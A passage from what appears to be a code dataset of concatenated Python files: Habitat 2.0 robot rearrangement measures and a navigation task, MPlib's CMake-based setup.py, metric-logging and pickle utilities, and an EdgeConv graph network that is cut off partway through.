def get_observation(self, observations, episode, *args, **kwargs):
T = self._sim.robot.base_transformation
forward = np.array([1.0, 0, 0])
heading = np.array(T.transform_vector(forward))
forward = forward[[0, 2]]
heading = heading[[0, 2]]
heading_angle = get_angle(forward, heading)
c = np.cross(forward, heading) < 0
if not c:
heading_angle = -1.0 * heading_angle
return np.array([*T.translation, heading_angle], dtype=np.float32)
@registry.register_sensor
class IsHoldingSensor(Sensor):
"""
Binary if the robot is holding an object or grasped onto an articulated object.
"""
cls_uuid: str = "is_holding"
def __init__(self, sim, config, *args, **kwargs):
super().__init__(config=config)
self._sim = sim
def _get_uuid(self, *args, **kwargs):
return IsHoldingSensor.cls_uuid
def _get_sensor_type(self, *args, **kwargs):
return SensorTypes.TENSOR
def _get_observation_space(self, *args, **kwargs):
return spaces.Box(shape=(1,), low=0, high=1, dtype=np.float32)
def get_observation(self, observations, episode, *args, **kwargs):
return np.array(int(self._sim.grasp_mgr.is_grasped)).reshape((1,))
@registry.register_measure
class ObjectToGoalDistance(Measure):
"""
Euclidean distance from the target object to the goal.
"""
cls_uuid: str = "object_to_goal_distance"
def __init__(self, sim, config, *args, **kwargs):
self._sim = sim
self._config = config
super().__init__(**kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return ObjectToGoalDistance.cls_uuid
def reset_metric(self, *args, episode, **kwargs):
self.update_metric(*args, episode=episode, **kwargs)
def update_metric(self, *args, episode, **kwargs):
idxs, goal_pos = self._sim.get_targets()
scene_pos = self._sim.get_scene_pos()
target_pos = scene_pos[idxs]
distances = np.linalg.norm(target_pos - goal_pos, ord=2, axis=-1)
self._metric = {str(idx): dist for idx, dist in zip(idxs, distances)}
@registry.register_measure
class ObjAtGoal(Measure):
"""
Returns if the target object is at the goal (binary) for each of the target
objects in the scene.
"""
cls_uuid: str = "obj_at_goal"
def __init__(self, *args, sim, config, task, **kwargs):
self._config = config
super().__init__(*args, sim=sim, config=config, task=task, **kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return ObjAtGoal.cls_uuid
def reset_metric(self, *args, episode, task, observations, **kwargs):
task.measurements.check_measure_dependencies(
self.uuid,
[
ObjectToGoalDistance.cls_uuid,
],
)
self.update_metric(
*args,
episode=episode,
task=task,
observations=observations,
**kwargs,
)
def update_metric(self, *args, episode, task, observations, **kwargs):
obj_to_goal_dists = task.measurements.measures[
ObjectToGoalDistance.cls_uuid
].get_metric()
self._metric = {
str(idx): dist < self._config.SUCC_THRESH
for idx, dist in obj_to_goal_dists.items()
}
@registry.register_measure
class EndEffectorToObjectDistance(Measure):
"""
Gets the distance between the end-effector and all current target object COMs.
"""
cls_uuid: str = "ee_to_object_distance"
def __init__(self, sim, config, *args, **kwargs):
self._sim = sim
self._config = config
super().__init__(**kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return EndEffectorToObjectDistance.cls_uuid
def reset_metric(self, *args, episode, **kwargs):
self.update_metric(*args, episode=episode, **kwargs)
def update_metric(self, *args, episode, **kwargs):
ee_pos = self._sim.robot.ee_transform.translation
idxs, _ = self._sim.get_targets()
scene_pos = self._sim.get_scene_pos()
target_pos = scene_pos[idxs]
distances = np.linalg.norm(target_pos - ee_pos, ord=2, axis=-1)
self._metric = {str(idx): dist for idx, dist in zip(idxs, distances)}
@registry.register_measure
class EndEffectorToRestDistance(Measure):
"""
Distance between current end effector position and position where end effector rests within the robot body.
"""
cls_uuid: str = "ee_to_rest_distance"
def __init__(self, sim, config, *args, **kwargs):
self._sim = sim
self._config = config
super().__init__(**kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return EndEffectorToRestDistance.cls_uuid
def reset_metric(self, *args, episode, **kwargs):
self.update_metric(*args, episode=episode, **kwargs)
def update_metric(self, *args, episode, task, observations, **kwargs):
to_resting = observations[RelativeRestingPositionSensor.cls_uuid]
rest_dist = np.linalg.norm(to_resting)
self._metric = rest_dist
@registry.register_measure
class ReturnToRestDistance(Measure):
"""
Distance between end-effector and resting position if the robot is holding the object.
"""
cls_uuid: str = "return_to_rest_distance"
def __init__(self, sim, config, *args, **kwargs):
self._sim = sim
self._config = config
super().__init__(**kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return ReturnToRestDistance.cls_uuid
def reset_metric(self, *args, episode, **kwargs):
self.update_metric(*args, episode=episode, **kwargs)
def update_metric(self, *args, episode, task, observations, **kwargs):
to_resting = observations[RelativeRestingPositionSensor.cls_uuid]
rest_dist = np.linalg.norm(to_resting)
snapped_id = self._sim.grasp_mgr.snap_idx
abs_targ_obj_idx = self._sim.scene_obj_ids[task.abs_targ_idx]
picked_correct = snapped_id == abs_targ_obj_idx
if picked_correct:
self._metric = rest_dist
else:
T_inv = self._sim.robot.ee_transform.inverted()
idxs, _ = self._sim.get_targets()
scene_pos = self._sim.get_scene_pos()
pos = scene_pos[idxs][0]
pos = T_inv.transform_point(pos)
self._metric = np.linalg.norm(task.desired_resting - pos)
@registry.register_measure
class RobotCollisions(Measure):
"""
Returns a dictionary with the counts for different types of collisions.
"""
cls_uuid: str = "robot_collisions"
def __init__(self, *args, sim, config, task, **kwargs):
self._sim = sim
self._config = config
self._task = task
super().__init__(*args, sim=sim, config=config, task=task, **kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return RobotCollisions.cls_uuid
def reset_metric(self, *args, episode, task, observations, **kwargs):
self._accum_coll_info = CollisionDetails()
self.update_metric(
*args,
episode=episode,
task=task,
observations=observations,
**kwargs,
)
def update_metric(self, *args, episode, task, observations, **kwargs):
cur_coll_info = self._task.get_cur_collision_info()
self._accum_coll_info += cur_coll_info
self._metric = {
"total_collisions": self._accum_coll_info.total_collisions,
"robot_obj_colls": self._accum_coll_info.robot_obj_colls,
"robot_scene_colls": self._accum_coll_info.robot_scene_colls,
"obj_scene_colls": self._accum_coll_info.obj_scene_colls,
}
@registry.register_measure
class RobotForce(Measure):
"""
The amount of force in newton's accumulatively applied by the robot.
"""
cls_uuid: str = "robot_force"
def __init__(self, *args, sim, config, task, **kwargs):
self._sim = sim
self._config = config
self._task = task
super().__init__(*args, sim=sim, config=config, task=task, **kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return RobotForce.cls_uuid
def reset_metric(self, *args, episode, task, observations, **kwargs):
self._accum_force = 0.0
self._prev_force = None
self._cur_force = None
self._add_force = None
self.update_metric(
*args,
episode=episode,
task=task,
observations=observations,
**kwargs,
)
@property
def add_force(self):
return self._add_force
def update_metric(self, *args, episode, task, observations, **kwargs):
robot_force, _, overall_force = self._task.get_coll_forces()
if self._task._config.COUNT_OBJ_COLLISIONS:
self._cur_force = overall_force
else:
self._cur_force = robot_force
if self._prev_force is not None:
self._add_force = self._cur_force - self._prev_force
if self._add_force > self._config.MIN_FORCE:
self._accum_force += self._add_force
self._prev_force = self._cur_force
elif self._add_force < 0.0:
self._prev_force = self._cur_force
else:
self._add_force = 0.0
else:
self._prev_force = self._cur_force
self._add_force = 0.0
self._metric = self._accum_force
@registry.register_measure
class NumStepsMeasure(Measure):
"""
The number of steps elapsed in the current episode.
"""
cls_uuid: str = "num_steps"
@staticmethod
def _get_uuid(*args, **kwargs):
return NumStepsMeasure.cls_uuid
def reset_metric(self, *args, episode, task, observations, **kwargs):
self._metric = 0
def update_metric(self, *args, episode, task, observations, **kwargs):
self._metric += 1
@registry.register_measure
class ForceTerminate(Measure):
"""
If the accumulated force throughout this episode exceeds the limit.
"""
cls_uuid: str = "force_terminate"
def __init__(self, *args, sim, config, task, **kwargs):
self._sim = sim
self._config = config
self._task = task
super().__init__(*args, sim=sim, config=config, task=task, **kwargs)
@staticmethod
def _get_uuid(*args, **kwargs):
return ForceTerminate.cls_uuid
def reset_metric(self, *args, episode, task, observations, **kwargs):
task.measurements.check_measure_dependencies(
self.uuid,
[
RobotForce.cls_uuid,
],
)
self.update_metric(
*args,
episode=episode,
task=task,
observations=observations,
**kwargs,
)
def update_metric(self, *args, episode, task, observations, **kwargs):
accum_force = task.measurements.measures[
RobotForce.cls_uuid
].get_metric()
if (
self._config.MAX_ACCUM_FORCE > 0
and accum_force > self._config.MAX_ACCUM_FORCE
):
rearrange_logger.debug(
f"Force threshold={self._config.MAX_ACCUM_FORCE} exceeded with {accum_force}, ending episode"
)
self._task.should_end = True
self._metric = True
else:
self._metric = False
@registry.register_measure
class DidViolateHoldConstraintMeasure(Measure):
cls_uuid: str = "did_violate_hold_constraint"
@staticmethod
def _get_uuid(*args, **kwargs):
return DidViolateHoldConstraintMeasure.cls_uuid
def __init__(self, *args, sim, **kwargs):
self._sim = sim
super().__init__(*args, sim=sim, **kwargs)
def reset_metric(self, *args, episode, task, observations, **kwargs):
self.update_metric(
*args,
episode=episode,
task=task,
observations=observations,
**kwargs,
)
def update_metric(self, *args, **kwargs):
self._metric = self._sim.grasp_mgr.is_violating_hold_constraint()
class RearrangeReward(Measure):
"""
An abstract class defining some measures that are always a part of any
reward function in the Habitat 2.0 tasks.
"""
def __init__(self, *args, sim, config, task, **kwargs):
self._sim = sim
self._config = config
self._task = task
super().__init__(*args, sim=sim, config=config, task=task, **kwargs)
def reset_metric(self, *args, episode, task, observations, **kwargs):
task.measurements.check_measure_dependencies(
self.uuid,
[
RobotForce.cls_uuid,
ForceTerminate.cls_uuid,
],
)
self.update_metric(
*args,
episode=episode,
task=task,
observations=observations,
**kwargs,
)
def update_metric(self, *args, episode, task, observations, **kwargs):
reward = 0.0
reward += self._get_coll_reward()
if self._sim.grasp_mgr.is_violating_hold_constraint():
reward -= self._config.CONSTRAINT_VIOLATE_PEN
force_terminate = task.measurements.measures[
ForceTerminate.cls_uuid
].get_metric()
if force_terminate:
reward -= self._config.FORCE_END_PEN
self._metric = reward
def _get_coll_reward(self):
reward = 0
force_metric = self._task.measurements.measures[RobotForce.cls_uuid]
# Penalize the force that was added to the accumulated force at the
# last time step.
reward -= max(
0, # This penalty is always positive
min(
self._config.FORCE_PEN * force_metric.add_force,
self._config.MAX_FORCE_PEN,
),
)
return reward
```
#### File: rearrange/sub_tasks/nav_to_obj_task.py
```python
import os.path as osp
import random
from collections import defaultdict
from dataclasses import dataclass
from typing import Any, Dict, List, Optional, Tuple
import magnum as mn
import numpy as np
from habitat.core.dataset import Episode
from habitat.core.registry import registry
from habitat.tasks.rearrange.multi_task.pddl_domain import PddlDomain
from habitat.tasks.rearrange.multi_task.rearrange_pddl import (
PddlAction,
RearrangeObjectTypes,
search_for_id,
)
from habitat.tasks.rearrange.multi_task.task_creator_utils import (
create_task_object,
)
from habitat.tasks.rearrange.rearrange_task import ADD_CACHE_KEY, RearrangeTask
from habitat.tasks.rearrange.utils import CacheHelper, rearrange_logger
DYN_NAV_TASK_NAME = "RearrangeNavToObjTask-v0"
@dataclass
class NavToInfo:
"""
:property nav_target_pos: Where the robot should navigate to.
:property nav_target_angle: What angle the robot should be at when at the goal.
:property nav_to_task_name: The name of the sub-task we are navigating to.
:property nav_to_obj_type: All sub-tasks are assumed to be interacting with
some object. This is the object the sub-task we are navigating to is
defined relative to.
"""
nav_target_pos: mn.Vector3
nav_target_angle: float
nav_to_task_name: str
nav_to_obj_type: RearrangeObjectTypes
start_hold_obj_idx: Optional[bool] = None
start_base_pos: Optional[mn.Vector3] = None
start_base_rot: Optional[float] = None
@registry.register_task(name=DYN_NAV_TASK_NAME)
class DynNavRLEnv(RearrangeTask):
"""
:_nav_to_info: Information about the next skill we are navigating to.
"""
def __init__(self, *args, config, dataset=None, **kwargs):
super().__init__(config=config, *args, dataset=dataset, **kwargs)
self.force_obj_to_idx = None
self.force_recep_to_name = None
self._prev_measure = 1.0
data_path = dataset.config.DATA_PATH.format(split=dataset.config.SPLIT)
fname = data_path.split("/")[-1].split(".")[0]
save_dir = osp.dirname(data_path)
self.cache = CacheHelper(
osp.join(save_dir, f"{fname}_{config.TYPE}_start.pickle"),
def_val={},
verbose=False,
)
self.start_states = self.cache.load()
self.domain = None
self._nav_to_info: Optional[NavToInfo] = None
@property
def nav_to_obj_type(self):
return self._nav_to_info.nav_to_obj_type
@property
def nav_to_task_name(self):
return self._nav_to_info.nav_to_task_name
@property
def nav_target_pos(self):
return self._nav_to_info.nav_target_pos
@property
def nav_target_angle(self):
return self._nav_to_info.nav_target_angle
def set_args(self, obj, **kwargs):
if "marker" in kwargs:
self.force_recep_to_name = kwargs["orig_applied_args"]["marker"]
self.force_obj_to_idx = obj
self.force_obj_to_name = kwargs["orig_applied_args"]["obj"]
self.force_kwargs = kwargs
def _get_allowed_tasks(
self, filter_actions: Optional[List[str]] = None
) -> Dict[str, List[PddlAction]]:
"""
:returns: Mapping the action name to the grounded instances of the action that are possible in the current state.
"""
cur_preds = self.domain.get_true_predicates()
# Get all actions which can be actively applied.
allowed_actions = defaultdict(list)
for action in self.domain.actions.values():
if (
filter_actions is not None
and action.name not in filter_actions
):
continue
if action.task == DYN_NAV_TASK_NAME or (
len(self._config.FILTER_NAV_TO_TASKS) != 0
and action.name not in self._config.FILTER_NAV_TO_TASKS
):
continue
consistent_actions = action.get_possible_actions(
cur_preds, self.domain.get_name_to_id_mapping()
)
rearrange_logger.debug(
f"For {action.name} got consistent actions:"
)
for action in consistent_actions:
rearrange_logger.debug(f"- {action}")
allowed_actions[action.name].append(action)
return allowed_actions
def _get_nav_targ(
self, task_name: str, task_args: Dict[str, Any], episode: Episode
) -> Tuple[mn.Vector3, float, RearrangeObjectTypes]:
rearrange_logger.debug(
f"Getting nav target for {task_name} with arguments {task_args}"
)
# Get the config for this task
action = self.domain.get_task_match_for_name(task_name)
rearrange_logger.debug(
f"Corresponding action with task={action.task}, task_def={action.task_def}, config_task_args={action.config_task_args}"
)
orig_state = self._sim.capture_state(with_robot_js=True)
create_task_object(
action.task,
action.task_def,
self._config.clone(),
self,
self._dataset,
False,
task_args,
episode,
action.config_task_args,
)
robo_pos = self._sim.robot.base_pos
heading_angle = self._sim.robot.base_rot
self._sim.set_state(orig_state, set_hold=True)
_, obj_to_type = search_for_id(
task_args["orig_obj"], self.domain.get_name_to_id_mapping()
)
return robo_pos, heading_angle, obj_to_type
def _generate_snap_to_obj(self) -> int:
# Snap the target object to the robot hand.
target_idxs, _ = self._sim.get_targets()
return self._sim.scene_obj_ids[target_idxs[0]]
def _generate_nav_start_goal(self, episode) -> NavToInfo:
start_hold_obj_idx: Optional[int] = None
# Only change the scene if this skill is not running as a sub-task
if random.random() < self._config.OBJECT_IN_HAND_SAMPLE_PROB:
start_hold_obj_idx = self._generate_snap_to_obj()
allowed_tasks = self._get_allowed_tasks()
nav_to_task_name = random.choice(list(allowed_tasks.keys()))
task = random.choice(allowed_tasks[nav_to_task_name])
target_pos, target_angle, obj_type = self._get_nav_targ(
nav_to_task_name,
{
**task.task_args,
ADD_CACHE_KEY: "nav",
},
episode,
)
rearrange_logger.debug(f"Got nav to skill {nav_to_task_name}")
target_pos = np.array(self._sim.safe_snap_point(target_pos))
start_pos, start_rot = get_robo_start_pos(self._sim, target_pos)
return NavToInfo(
nav_target_pos=target_pos,
nav_target_angle=float(target_angle),
nav_to_task_name=nav_to_task_name,
nav_to_obj_type=obj_type,
start_hold_obj_idx=start_hold_obj_idx,
start_base_pos=start_pos,
start_base_rot=start_rot,
)
def _get_force_nav_start_info(self, episode: Episode) -> NavToInfo:
rearrange_logger.debug(
f"Navigation getting target for {self.force_obj_to_idx} with task arguments {self.force_kwargs}"
)
name_to_id = self.domain.get_name_to_id_mapping()
if self.force_recep_to_name is not None:
rearrange_logger.debug(
f"Forcing receptacle {self.force_recep_to_name}"
)
_, entity_type = search_for_id(
self.force_recep_to_name, name_to_id
)
use_name = self.force_recep_to_name
else:
_, entity_type = search_for_id(self.force_obj_to_name, name_to_id)
use_name = self.force_obj_to_name
rearrange_logger.debug(
f"Search object name {use_name} with type {entity_type}"
)
matching_skills = self.domain.get_matching_skills(
entity_type, use_name
)
allowed_tasks = self._get_allowed_tasks(matching_skills)
if len(allowed_tasks) == 0:
raise ValueError(
f"Got no allowed tasks {allowed_tasks} from {matching_skills}, {entity_type}, {use_name}"
)
filtered_allowed_tasks = []
orig_args = self.force_kwargs["orig_applied_args"]
for sub_allowed_tasks in allowed_tasks.values():
for task in sub_allowed_tasks:
assigned_args = task.task_args
# Check that `orig_args` is a SUBSET of `assigned_args` meaning
# the keys and values match something in assigned args.
is_orig_args_subset = all(
[
assigned_args.get(k, None) == v
or assigned_args.get(f"orig_{k}", None) == v
for k, v in orig_args.items()
]
)
if is_orig_args_subset:
filtered_allowed_tasks.append(task)
rearrange_logger.debug(f"Got allowed tasks {filtered_allowed_tasks}")
if len(filtered_allowed_tasks) == 0:
allowed_tasks_str = (
"".join(["\n - " + x for x in allowed_tasks]) + "\n"
)
raise ValueError(
f"Got no tasks out of {allowed_tasks_str}. With entity_type={entity_type}, use_name={use_name} force kwargs={self.force_kwargs}"
)
nav_to_task = filtered_allowed_tasks[0]
rearrange_logger.debug(
f"Navigating to {nav_to_task.name} with arguments {nav_to_task.task_args}"
)
targ_pos, nav_target_angle, obj_type = self._get_nav_targ(
nav_to_task.name, nav_to_task.task_args, episode
)
return NavToInfo(
nav_target_pos=np.array(self._sim.safe_snap_point(targ_pos)),
nav_target_angle=float(nav_target_angle),
nav_to_task_name=nav_to_task.name,
nav_to_obj_type=obj_type,
)
def reset(self, episode: Episode):
sim = self._sim
super().reset(episode, fetch_observations=False)
rearrange_logger.debug("Resetting navigation task")
if self.domain is None:
self.domain = PddlDomain(
self._config.PDDL_DOMAIN_DEF,
self._dataset,
self._config,
self._sim,
)
else:
self.domain.reset()
episode_id = sim.ep_info["episode_id"]
if self.force_obj_to_idx is not None:
full_key = (
f"{episode_id}_{self.force_obj_to_idx}_{self.force_kwargs}"
)
if (
full_key in self.start_states
and not self._config.FORCE_REGENERATE
):
self._nav_to_info = self.start_states[full_key]
rearrange_logger.debug(
f"Forcing episode, loaded `{full_key}` from cache {self.cache.cache_id}."
)
if not isinstance(self._nav_to_info, NavToInfo):
rearrange_logger.warning(
f"Incorrect cache saved to file {self._nav_to_info}. Regenerating now."
)
self._nav_to_info = None
if self._nav_to_info is None:
self._nav_to_info = self._get_force_nav_start_info(episode)
self.start_states[full_key] = self._nav_to_info
if self._config.SHOULD_SAVE_TO_CACHE:
self.cache.save(self.start_states)
rearrange_logger.debug(
f"Forcing episode, saved key `{full_key}` to cache {self.cache.cache_id}."
)
else:
if (
episode_id in self.start_states
and not self._config.FORCE_REGENERATE
):
self._nav_to_info = self.start_states[episode_id]
if (
not isinstance(self._nav_to_info, NavToInfo)
or self._nav_to_info.start_base_pos is None
or self._nav_to_info.start_base_rot is None
):
rearrange_logger.warning(
f"Incorrect cache saved to file {self._nav_to_info}. Regenerating now."
)
self._nav_to_info = None
else:
rearrange_logger.debug(
f"Loaded episode from cache {self.cache.cache_id}."
)
if (
self._nav_to_info is not None
and self._nav_to_info.start_hold_obj_idx is not None
):
# The object to hold was generated from stale object IDs.
# Reselect a new object to hold.
self._nav_to_info.start_hold_obj_idx = (
self._generate_snap_to_obj()
)
if self._nav_to_info is None:
self._nav_to_info = self._generate_nav_start_goal(episode)
self.start_states[episode_id] = self._nav_to_info
if self._config.SHOULD_SAVE_TO_CACHE:
self.cache.save(self.start_states)
rearrange_logger.debug(
f"Saved episode to cache {self.cache.cache_id}."
)
sim.robot.base_pos = self._nav_to_info.start_base_pos
sim.robot.base_rot = self._nav_to_info.start_base_rot
if self._nav_to_info.start_hold_obj_idx is not None:
if self._sim.grasp_mgr.is_grasped:
raise ValueError(
f"Attempting to grasp {self._nav_to_info.start_hold_obj_idx} even though object is already grasped"
)
rearrange_logger.debug(
f"Forcing to grasp object {self._nav_to_info.start_hold_obj_idx}"
)
self._sim.grasp_mgr.snap_to_obj(
self._nav_to_info.start_hold_obj_idx, force=True
)
rearrange_logger.debug(f"Got nav to info {self._nav_to_info}")
if not sim.pathfinder.is_navigable(self._nav_to_info.nav_target_pos):
rearrange_logger.error("Goal is not navigable")
if self._sim.habitat_config.DEBUG_RENDER:
# Visualize the position the agent is navigating to.
sim.viz_ids["nav_targ_pos"] = sim.visualize_position(
self._nav_to_info.nav_target_pos,
sim.viz_ids["nav_targ_pos"],
r=0.2,
)
return self._get_observations(episode)
def get_robo_start_pos(
sim, nav_targ_pos: mn.Vector3
) -> Tuple[np.ndarray, float]:
orig_state = sim.capture_state()
start_pos, start_rot = sim.set_robot_base_to_random_point(
max_attempts=1000
)
# Reset everything except for the robot state.
orig_state["robot_T"] = None
sim.set_state(orig_state)
return start_pos, start_rot
``` |
{
"source": "Jiayuan-Gu/MPlib",
"score": 2
} |
#### File: Jiayuan-Gu/MPlib/setup.py
```python
import os
import sys
import subprocess
from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext
class CMakeExtension(Extension):
def __init__(self, name, sourcedir=""):
Extension.__init__(self, name, sources=[])
self.sourcedir = os.path.abspath(sourcedir)
class CMakeBuild(build_ext):
def build_extension(self, ext):
extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
if not extdir.endswith(os.path.sep):
extdir += os.path.sep
cfg = "Debug" if self.debug else "Release"
cmake_generator = os.environ.get("CMAKE_GENERATOR", "")
# Set Python_EXECUTABLE instead if you use PYBIND11_FINDPYTHON
cmake_args = [
"-DCMAKE_LIBRARY_OUTPUT_DIRECTORY={}".format(extdir),
"-DPYTHON_EXECUTABLE={}".format(sys.executable),
"-DCMAKE_BUILD_TYPE={}".format(cfg), # not used on MSVC, but no harm
]
build_args = []
#if not cmake_generator:
# cmake_args += ["-GNinja"]
self.parallel = 16
if "CMAKE_BUILD_PARALLEL_LEVEL" not in os.environ:
if hasattr(self, "parallel") and self.parallel:
build_args += ["-j{}".format(self.parallel)]
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
print(cmake_args, build_args)
subprocess.check_call(
["cmake", ext.sourcedir] + cmake_args, cwd=self.build_temp
)
subprocess.check_call(
["cmake", "--build", "."] + build_args, cwd=self.build_temp
)
setup(
name="mplib",
version="0.0.4",
author_email="<EMAIL>",
keywords="robotics motion planning",
description="A lightweight motion planning library",
classifiers=[
"Operating System :: POSIX :: Linux",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Other Audience",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Framework :: Robot Framework :: Tool",
"Programming Language :: C++",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: Education",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Utilities",
],
python_requires='>=3.6',
install_requires=["numpy >= 1.20", "toppra >= 0.4.0", "transforms3d >= 0.3.1"],
ext_modules=[CMakeExtension("_mplib")],
cmdclass={"build_ext": CMakeBuild},
zip_safe=False,
packages=["mplib"],
package_dir = {"mplib": "mplib/"}
)
``` |
{
"source": "Jiayuan-Gu/policy-refactorization",
"score": 2
} |
#### File: common/utils/metric_logger.py
```python
from __future__ import division
from collections import defaultdict
from collections import deque
import numpy as np
import torch
class Metric(object):
def update(self, *args, **kwargs):
raise NotImplementedError()
def reset(self):
raise NotImplementedError()
@property
def result(self):
raise NotImplementedError()
def __str__(self):
raise NotImplementedError()
@property
def summary_str(self):
raise NotImplementedError()
class Average(Metric):
"""Track a series of values and provide access to smoothed values over a
window or the global series average.
"""
default_fmt = '{avg:.4f} ({global_avg:.4f})'
default_summary_fmt = '{global_avg:.4f}'
def __init__(self, window_size=20, fmt=None, summary_fmt=None):
self.values = deque(maxlen=window_size)
self.counts = deque(maxlen=window_size)
self.sum = 0.0
self.count = 0
self.fmt = fmt or self.default_fmt
self.summary_fmt = summary_fmt or self.default_summary_fmt
def update(self, value, count=1):
self.values.append(value)
self.counts.append(count)
self.sum += value
self.count += count
def reset(self):
self.values.clear()
self.counts.clear()
self.sum = 0.0
self.count = 0
@property
def result(self):
return self.global_avg
def __str__(self):
return self.fmt.format(avg=self.avg, global_avg=self.global_avg)
@property
def summary_str(self):
return self.summary_fmt.format(global_avg=self.global_avg)
@property
def avg(self):
return np.sum(self.values) / np.sum(self.counts)
@property
def global_avg(self):
return self.sum / self.count if self.count != 0 else float('nan')
class Accuracy(Average):
default_fmt = '{avg:.2f} ({global_avg:.2f})'
default_summary_fmt = '{global_avg:.2f}'
def update(self, y_pred, y_true):
assert y_pred.shape == y_true.shape
if torch.is_tensor(y_pred) and torch.is_tensor(y_true):
mask = torch.eq(y_pred, y_true)
value = mask.float().sum().item()
count = mask.numel()
elif isinstance(y_pred, np.ndarray) and isinstance(y_true, np.ndarray):
mask = np.equal(y_pred, y_true)
value = mask.sum().item()
count = mask.size
else:
raise TypeError('{}, {}'.format(type(y_pred), type(y_true)))
super().update(value=value, count=count)
@property
def avg(self):
return super().avg * 100.0
@property
def global_avg(self):
return super().global_avg * 100.0
class MetricLogger(object):
"""Metric logger."""
def __init__(self, delimiter='\t'):
self.metrics = defaultdict(Average)
self.delimiter = delimiter
def update(self, **kwargs):
for k, v in kwargs.items():
if isinstance(v, torch.Tensor):
count = v.numel()
value = v.item() if count == 1 else v.sum().item()
elif isinstance(v, np.ndarray):
count = v.size
value = v.item() if count == 1 else v.sum().item()
elif isinstance(v, (tuple, list)):
value, count = v
value = value.item()
count = count.item()
elif isinstance(v, (float, int)):
value = v
count = 1
else:
raise TypeError('Unsupported type: '.format(type(v)))
self.metrics[k].update(value, count)
def __getitem__(self, item):
return self.metrics[item]
def __str__(self):
ret_str = []
for name, metric in self.metrics.items():
ret_str.append('{}: {}'.format(name, str(metric)))
return self.delimiter.join(ret_str)
@property
def summary_str(self):
ret_str = []
for name, metric in self.metrics.items():
ret_str.append('{}: {}'.format(name, metric.summary_str))
return self.delimiter.join(ret_str)
def reset(self):
for metric in self.metrics.values():
metric.reset()
def test_Accuracy():
acc_metric = Accuracy()
acc_metric.update(np.array([1, 0, 1]), np.array([1, 0, 0]))
np.testing.assert_allclose(acc_metric.result, 2.0 / 3.0 * 100.0)
print(acc_metric)
acc_metric.update(torch.tensor([1, 0, 1]), torch.tensor([1, 0, 1]))
np.testing.assert_allclose(acc_metric.result, 5.0 / 6.0 * 100.0)
print(acc_metric)
```
#### File: common/utils/misc.py
```python
import os
import numpy as np
import torch
import gzip
import pickle
def print_dict(d: dict):
"""Print the given dictionary for debugging."""
for k, v in d.items():
if isinstance(v, (np.ndarray, torch.Tensor)):
print(k, v.shape)
else:
print(k, v)
def dynamic_load_modules(target_dir, context,
excludes=('__init__.py',),
verbose=True):
"""Load all the python files(.py) in the current directory.
Notes:
It is suggested to import modules explicitly.
However, sometimes, we may temporarily add some modules to experiments,
but do not want to include them in git or hope the program can still run
when we remove the experimental modules.
"from xxx import *" is not encouraged, unless __all__ is controlled carefully.
"""
all_filenames = os.listdir(target_dir)
py_filenames = [x for x in all_filenames if x.endswith('.py') and x not in excludes]
if verbose:
print(py_filenames)
module_names = [os.path.splitext(x)[0] for x in py_filenames]
for name in module_names:
exec('from .{} import *'.format(name), context)
def dump_pickle(obj, path):
if path.endswith('.pkl'):
with open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
elif path.endswith('.pgz'):
with gzip.open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
else:
raise RuntimeError('Unsupported extension {}.'.format(os.path.splitext(path)[-1]))
def load_pickle(path):
if path.endswith('.pkl'):
with open(path, 'rb') as f:
return pickle.load(f)
elif path.endswith('.pgz'):
with gzip.open(path, 'rb') as f:
return pickle.load(f)
else:
raise RuntimeError('Unsupported extension {}.'.format(os.path.splitext(path)[-1]))
```
#### File: refactorization/models_gnn/ec_net.py
```python
import torch
import torch.nn as nn
import torch_geometric.nn as gnn
from torch_geometric.nn import EdgeConv
from refactorization.models_gnn.base import BaseGNN
class EdgeConvNet(BaseGNN):
def __init__(self, global_aggr='max', output_dim=3):
super(BaseGNN, self).__init__()
self.output_dim = output_dim
self.encoder = nn.Sequential(
nn.Conv2d(3, 16, 3, padding=1, bias=True), nn.ReLU(),
nn.MaxPool2d(2, 2), # [8, 8]
nn.Conv2d(16, 32, 3, padding=1, bias=True), nn.ReLU(),
nn.MaxPool2d(2, 2), # [4, 4]
nn.Conv2d(32, 64, 3, padding=1, bias=False), nn.GroupNorm(4, 64), nn.ReLU(),
nn.MaxPool2d(2, 2), # [2, 2]
nn.Conv2d(64, 128, 3, padding=1, bias=False), nn.GroupNorm(8, 128), nn.ReLU(),
nn.MaxPool2d(2, 2), # [1, 1]
)
local_nn = nn.Sequential(
nn.Linear((128 + 4) * 2, 128, bias=False), nn.GroupNorm(8, 128), nn.ReLU(),
nn.Linear(128, 128, bias=False), nn.GroupNorm(8, 128), nn.ReLU(),
nn.Linear(128, 128, bias=False), nn.GroupNorm(8, 128), nn.ReLU(),
)
self.gnn = EdgeConv(local_nn, aggr='max')
self.encoder2 = nn.Sequential(
nn.Linear(128, 128, bias=False), nn.GroupNorm(8, 128), nn.ReLU(),
nn.Linear(128, 128, bias=False), nn.GroupNorm(8, 128), nn.ReLU(),
)
self.global_aggr = global_aggr
self.fc = nn.Sequential(
nn.Linear(128, 128, bias=True), nn.ReLU(),
nn.Linear(128, 128, bias=True), nn.ReLU(),
nn.Linear(128, output_dim),
)
self.reset_parameters()
def forward(self, data, batch_size=None, **kwargs):
x = data.x
batch = data.batch
edge_index = data.edge_index
pos = data.pos
# infer real batch size, in case empty sample
if batch_size is None:
batch_size = data['size'].sum().item()
img_feature = self.encoder(x).flatten(1)
x = torch.cat([img_feature, pos], dim=1)
x = self.gnn(x=x, edge_index=edge_index)
x = self.encoder2(x)
if self.global_aggr == 'max':
global_feature = gnn.global_max_pool(x, batch, size=batch_size)
elif self.global_aggr == 'sum':
global_feature = gnn.global_add_pool(x, batch, size=batch_size)
